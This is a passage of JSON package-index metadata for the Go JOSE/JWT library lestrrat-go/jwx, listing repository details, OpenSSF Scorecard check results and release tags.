],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/jwe/internal/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-04-28T20:19:57.216Z","latest_release_number":null,"last_synced_at":"2026-05-29T19:17:14.881Z","created_at":"2022-04-13T00:48:58.937Z","updated_at":"2026-05-29T19:17:14.882Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","install_command":"go get github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwe/internal/cmd/genheader#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestr